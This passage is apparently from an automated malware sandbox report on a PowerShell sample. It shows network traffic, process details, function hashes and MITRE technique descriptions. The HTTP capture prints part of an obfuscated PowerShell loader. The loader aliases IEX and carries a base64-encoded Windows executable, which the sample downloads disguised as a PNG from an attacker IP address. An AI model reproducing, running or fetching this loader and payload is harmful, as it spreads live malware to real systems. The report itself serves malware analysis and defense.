Dec 18, 2024 08:14:01.466536999 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.466617107 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.466689110 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.471376896 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.471426964 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.471477985 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.476178885 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.476311922 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.476356983 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.481127024 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.481142044 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.481215000 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.486057043 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.486073017 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.486141920 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.490719080 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.490905046 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.490962982 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.495803118 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.495817900 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.495877028 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.500349998 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.500648975 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.500700951 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.505290031 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.505537987 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.505589008 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.529450893 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.573407888 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.600934982 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.600951910 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.601017952 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.602739096 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.602830887 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.602878094 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.606853008 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.607085943 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.607139111 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.610972881 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.611066103 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.611113071 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.615005970 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.615191936 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.615495920 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.619139910 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.619167089 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.619224072 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.622565031 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.622739077 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.622785091 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.626226902 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.626490116 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.626538992 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.629975080 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.630120993 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.630177975 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.633409977 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.633661032 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.633724928 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.636811972 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.636919022 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.636965990 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.640285969 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.640405893 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.640449047 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.643832922 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.643847942 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.643918037 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.647279024 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.647404909 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.647455931 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.650610924 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.650881052 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.650923967 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.654036999 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.654238939 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.654290915 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.657561064 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.657576084 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.657640934 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.661004066 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.661216021 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.661261082 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.664341927 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.664529085 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.664604902 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.667762041 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.667828083 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.667891979 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.671463966 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.671480894 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.671535015 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.674638033 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.674758911 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.674803019 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.680259943 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.680274963 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.680330992 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.681660891 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.681751966 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.681797028 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.685033083 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.685189009 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.685235023 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.688450098 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.688597918 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.688642025 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.694276094 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.694299936 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.694355011 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.696270943 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.696433067 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.696499109 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.699522018 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.699707985 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.699755907 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.702383041 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.702749014 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.702847004 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.704952955 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.705060005 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.705104113 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.707921028 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.707998991 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.708048105 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.791805029 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.791841030 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.791899920 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.793023109 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.793049097 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.793087959 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.795741081 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.795917988 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.795963049 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.798587084 CET	80	49730	92.255.57.155	192.168.2.4
Dec 18, 2024 08:14:01.839006901 CET	49730	80	192.168.2.4	92.255.57.155
Dec 18, 2024 08:14:01.987370968 CET	49730	80	192.168.2.4	92.255.57.155

HTTP Request Dependency Graph

92.255.57.155

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	92.255.57.155	80	6336	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 08:13:59.707861900 CET	70	OUT	GET /1/1.png HTTP/1.1 Host: 92.255.57.155 Connection: Keep-Alive
Dec 18, 2024 08:14:01.027664900 CET	1236	IN	HTTP/1.1 200 OK Content-Type: image/png Last-Modified: Tue, 10 Dec 2024 15:20:42 GMT Accept-Ranges: bytes ETag: "184f8c13174bdb1:0" Server: Microsoft-IIS/10.0 Date: Wed, 18 Dec 2024 07:14:00 GMT Content-Length: 180045 Data Raw: 69 70 63 6f 6e 66 69 67 20 2f 66 6c 75 73 68 64 6e 73 0d 0a 0d 0a 20 24 74 30 3d 27 49 51 49 51 51 49 45 58 27 2e 72 65 70 6c 61 63 65 28 27 49 51 49 51 51 27 2c 27 27 29 3b 73 61 6c 20 47 47 20 24 74 30 3b 0d 0a 0d 0a 24 4f 45 3d 22 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 42 71 73 56 57 63 41 41 41 41 41 41 41 41 41 41 4f 41 41 4c 69 45 4c 41 54 41 41 41 44 34 42 41 41 42 43 41 51 41 41 41 41 41 41 79 6c 77 42 41 41 41 67 41 41 41 41 59 41 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41 41 42 41 41 41 41 41 [TRUNCATED] Data Ascii: ipconfig /flushdns $t0='IQIQQIEX'.replace('IQIQQ','');sal GG $t0;$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABqsVWcAAAAAAAAAAOAALiELATAAAD4BAABCAQAAAAAAylwBAAAgAAAAYAEAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACgAQAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAHBcAQBXAAAAAIABAFQDAAAAAAAAAAAAAAAAAAAAAAAAAGABAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAA0DwBAAAgAAAAPgEAAAIAAAAAAAAAAAAAAAAAACAAAGAucmVsb2MAAAwAAAAAYAEAAAIAAABAAQAAAAAAAAAAAAAAAABAAABCLnJzcmMAAABUAwAAAIABAAAEAAAAQgEAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAACsXAEAAAAAAEgAAAACAAUARKIAACy6AAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMwAwBUAAAAAQAAESjuAAAGID0vBWkgGpDlTmElChpeRQQAAADc////FgAAACoAAAACAAAAKygouQIABgYg5UleYlogUMY9rmEryyihAgAGBiB+0lLtWiAmUGMuYSu3KhMwCgBbAQAAAgAA
Dec 18, 2024 08:14:01.027682066 CET	1236	IN	Data Raw: 45 53 42 34 49 72 55 5a 4b 41 45 41 41 43 73 4b 49 4d 31 37 56 55 6f 67 65 39 32 31 65 57 45 6c 45 77 59 65 58 6b 55 49 41 41 41 41 79 2f 2f 2f 2f 32 63 41 41 41 42 4a 41 41 41 41 32 67 41 41 41 42 6f 42 41 41 43 48 41 41 41 41 42 51 41 41 41 50 Data Ascii: ESB4IrUZKAEAACsKIM17VUoge921eWElEwYeXkUIAAAAy////2cAAABJAAAA2gAAABoBAACHAAAABQAAAP0AAAA4FQEAAChsAgAGKGUBAAYLByDS6LTvKAIAACsXKEACAAYTBBEEFig7AgAGKNgAAAaiEQQoigEABgwRBiBx6wTIWiBMzrCDYSuHCX4MAQAEKAECAAYRBiC8fpMBWiDXL8WnYThp////CCwIIAZqLgclKwYgeI9
Dec 18, 2024 08:14:01.027697086 CET	1236	IN	Data Raw: 42 69 6f 54 4d 41 51 41 42 67 41 41 41 41 45 41 41 42 45 6f 61 67 49 41 42 69 6f 41 41 42 4d 77 42 51 41 49 41 41 41 41 41 51 41 41 45 51 49 44 4b 46 41 42 41 41 59 71 45 7a 41 45 41 41 63 41 41 41 41 42 41 41 41 52 41 69 67 36 41 67 41 47 4b 67 Data Ascii: BioTMAQABgAAAAEAABEoagIABioAABMwBQAIAAAAAQAAEQIDKFABAAYqEzAEAAcAAAABAAARAig6AgAGKgATMAQABgAAAAEAABEoMAEABioAABMwBAAGAAAAAQAAESjZAgAGKgAAEzAEAAcAAAABAAARAiirAQAGKgATMAQABwAAAAEAABECKLUAAAYqABMwBAAHAAAAAQAAEQIoqwEABioAEzAEAAcAAAABAAARAig6AgAGKgA
Dec 18, 2024 08:14:01.027712107 CET	1236	IN	Data Raw: 48 77 6d 56 59 5a 34 52 44 43 42 72 43 2b 65 6a 57 69 42 42 6c 66 72 6b 59 54 69 76 2f 76 2f 2f 45 51 6f 58 57 42 4d 4b 45 51 77 67 50 49 78 6c 6b 56 6f 67 54 38 64 4e 31 47 45 34 6c 76 37 2f 2f 78 59 54 43 68 45 4d 49 41 35 74 76 54 4e 61 49 4e Data Ascii: HwmVYZ4RDCBrC+ejWiBBlfrkYTiv/v//EQoXWBMKEQwgPIxlkVogT8dN1GE4lv7//xYTChEMIA5tvTNaINaR6u9hOID+//8RDCDO2mDpWiDVMBy0YTht/v//EQcfCxEHHwuVCB8LlWGeEQwgjY8czlog8ufzs2E4S/7//xEHFhEHFpUIFpVhnhEHFxEHF5UIF5VhnhEHGBEHGJUIGJVhnhEHGREHGZUIGZVhnhEMIPTUTjBaIHj
Dec 18, 2024 08:14:01.027726889 CET	1236	IN	Data Raw: 6b 59 71 6c 34 32 45 34 48 76 76 2f 2f 79 6f 41 45 7a 41 4a 41 4c 4d 43 41 41 41 47 41 41 41 52 41 69 42 44 4a 6d 57 74 57 69 41 47 4c 70 63 68 59 52 41 41 41 68 38 65 5a 41 6f 53 41 66 34 56 41 51 41 41 47 77 49 67 2f 2f 2f 2f 50 31 38 51 41 41 Data Ascii: kYql42E4Hvv//yoAEzAJALMCAAAGAAARAiBDJmWtWiAGLpchYRAAAh8eZAoSAf4VAQAAGwIg////P18QAAIYYhAAIBMANVYgju/oKmElEwcfDl5FDgAAAMYAAAA8AQAA+AEAAFkAAABpAQAArAAAAPUAAACy////BQAAAA8BAABPAQAAOQIAACYCAADVAQAAODQCAAB+AQAABAIlF1gQAOCRfgEAAAQCJRdYEADgkR5iYH4BAAA
Dec 18, 2024 08:14:01.027745962 CET	1236	IN	Data Raw: 6b 58 34 42 41 41 41 45 41 69 55 58 57 42 41 41 34 4a 45 65 59 6d 42 2b 41 51 41 41 42 41 49 6c 46 31 67 51 41 4f 43 52 48 78 42 69 59 48 34 42 41 41 41 45 41 69 55 58 57 42 41 41 34 4a 45 66 47 47 4a 67 44 42 45 48 49 49 36 4f 6a 43 4a 61 49 4c Data Ascii: kX4BAAAEAiUXWBAA4JEeYmB+AQAABAIlF1gQAOCRHxBiYH4BAAAEAiUXWBAA4JEfGGJgDBEHII6OjCJaILscxwRhOAb///8CHx5kChEHILyuM5VaIHpeGm5hOO7+///QAQAAGyh6AQAGKFQBAAYRBShwAgAGEwZ+AQAABAIRBhYRBBpZKJkCAAYRBqUBAAAbCxEHICvc6RVaIFn0mohhOKn+//8ofgEABn4BAAAEAggoSAIABig
Dec 18, 2024 08:14:01.027776957 CET	1236	IN	Data Raw: 73 2f 37 2f 2f 78 49 42 2f 68 55 42 41 41 41 62 41 69 44 2f 2f 2f 38 2f 58 78 41 41 41 68 68 69 45 41 41 52 42 79 42 51 44 38 55 52 57 69 42 58 63 76 66 52 59 54 69 4b 2f 76 2f 2f 66 67 45 41 41 41 51 43 4a 52 64 59 45 41 44 67 6b 58 34 42 41 41 Data Ascii: s/7//xIB/hUBAAAbAiD///8/XxAAAhhiEAARByBQD8URWiBXcvfRYTiK/v//fgEAAAQCJRdYEADgkX4BAAAEAiUXWBAA4JEeYmB+AQAABAIlF1gQAOCRHxBiYH4BAAAEAiUXWBAA4JEfGGJgEwQRByDTCLgsWiBV2Py1YTg2/v//fgEAAAQCJRdYEADgkX4BAAAEAiUXWBAA4JEeYmB+AQAABAIlF1gQAOCRHxBiYH4BAAAEAiU
Dec 18, 2024 08:14:01.028085947 CET	1236	IN	Data Raw: 56 33 50 67 59 54 6a 37 2f 66 2f 2f 45 51 63 67 51 42 67 36 31 6c 6f 67 77 58 71 48 50 47 45 34 36 50 33 2f 2f 77 5a 75 46 6d 6f 75 43 43 43 6c 68 36 51 65 4a 53 73 47 49 4a 74 45 5a 45 67 6c 4a 68 45 48 49 4f 71 6f 78 68 78 61 59 54 6a 46 2f 66 Data Ascii: V3PgYTj7/f//EQcgQBg61logwXqHPGE46P3//wZuFmouCCClh6QeJSsGIJtEZEglJhEHIOqoxhxaYTjF/f//0AEAABsoegEABihUAQAGEQUocAIABhMGEQcgV19Q3logaYhNHWE4mv3//wZuGGouCCDsucuQJSsGIGa+spslJjiA/f//fgEAAAQCEQYWEQQaWSiZAgAGEQalAQAAGwsRByDDuPiDWiADl1xpYThT/f//F40BAAA
Dec 18, 2024 08:14:01.028100967 CET	1236	IN	Data Raw: 6f 4b 49 6c 4a 6a 68 62 2f 66 2f 2f 46 34 30 42 41 41 41 62 44 52 45 48 49 4f 70 70 41 2b 46 61 49 4c 6b 71 42 52 74 68 4f 45 48 39 2f 2f 39 2b 41 51 41 41 42 41 49 4a 46 76 34 63 41 51 41 41 47 79 69 5a 41 67 41 47 45 51 63 67 6c 34 30 32 77 31 Data Ascii: oKIlJjhb/f//F40BAAAbDREHIOppA+FaILkqBRthOEH9//9+AQAABAIJFv4cAQAAGyiZAgAGEQcgl402w1og/vEGmWE4G/3//xEGpQEAABsLEQcgobZI51ogrx/mKGE4AP3//9ABAAAbKHoBAAYoVAEABhEFKHACAAYTBhEHIG4Lt9BaIFxN1XNhONX8//8RByDEBcLJWiB1CJi3YTjC/P//ByoTMAgAsAQAAAUAABEgcAAAAAo
Dec 18, 2024 08:14:01.028116941 CET	1236	IN	Data Raw: 45 51 63 66 44 42 45 48 48 77 79 56 43 42 38 4d 6c 57 47 65 45 51 77 67 55 61 31 52 6d 31 6f 67 74 4b 50 37 57 57 45 34 2b 76 7a 2f 2f 79 44 7a 62 65 55 76 44 52 59 54 42 42 45 4d 49 45 2f 51 6e 67 5a 61 49 4e 34 6c 4c 30 4e 68 4f 4e 37 38 2f 2f Data Ascii: EQcfDBEHHwyVCB8MlWGeEQwgUa1Rm1ogtKP7WWE4+vz//yDzbeUvDRYTBBEMIE/QngZaIN4lL0NhON78//8fECgKAgAGDBEMIKDffCZaIAZcYQ1hOMP8//8WEwkgRQqK2ji2/P//FhMFEQwgXnXYfVogptl7QmE4oPz//xEHHBEHHJUIHJVhnhEMIKgkbS5aIN8E5UlhOIH8//8RCh8QLwgg2R9ruiUrBiA65mPWJSY4Z/z//wk
Dec 18, 2024 08:14:01.147536993 CET	1236	IN	Data Raw: 43 41 41 41 42 41 49 6c 65 77 55 41 41 41 51 43 65 77 55 41 41 41 51 62 5a 46 6c 39 42 51 41 41 42 43 43 7a 59 49 70 53 4f 4a 58 2b 2f 2f 38 44 41 33 73 49 41 41 41 45 48 6d 49 44 65 77 6f 41 41 41 51 6f 2f 51 45 41 42 69 55 6d 30 6d 42 39 43 41 Data Ascii: CAAABAIlewUAAAQCewUAAAQbZFl9BQAABCCzYIpSOJX+//8DA3sIAAAEHmIDewoAAAQo/QEABiUm0mB9CAAABAMlewkAAAQeYn0JAAAEByDwAxw3WiDAxI4IYThY/v//A3sIAAAEBjQSHEUBAAAA9v///yAWZ0tMJSsGIKc4ThMlJgcglofFzVphOCn+//8XKgADMAkABwAAAAAAAAACKHgAAAoqABMwBwAZAAAAAQAAEQIDfQc

Target ID:	0
Start time:	02:13:56
Start date:	18/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\anyrunsample.ps1"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	02:13:56
Start date:	18/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 00007FFD9B96080E Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1747419703.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc5e181b186569a6fa070ebfd2ffa1161cde136e00bc5edf27c0bc4da7382857
Instruction ID: d72d2ee3d9d6ec019971b2871830297c6fee4b0f4afc97744b9047f12ad1a420
Opcode Fuzzy Hash: dc5e181b186569a6fa070ebfd2ffa1161cde136e00bc5edf27c0bc4da7382857
Instruction Fuzzy Hash: B6512722F2FA9A5FFBA9D76814F12B867D1DF54B50B0900BAC45DC31EBDD09AD018381

Function 00007FFD9B96085A Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1747419703.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 413146b441e4eb68a93227550d3362742c0ecd6faad5b167bf13889e449a7d5c
Instruction ID: e255ffeaf4b86fa67965c2c5f82c4f0704f68707b14585c666d6deec589adb53
Opcode Fuzzy Hash: 413146b441e4eb68a93227550d3362742c0ecd6faad5b167bf13889e449a7d5c
Instruction Fuzzy Hash: 1C31D022F2FA9A5FF7A9A3A814F52B827C1DF54B64B5900BAD45DC31EBDD0D5D004341

Function 00007FFD9B8933B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1745017167.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
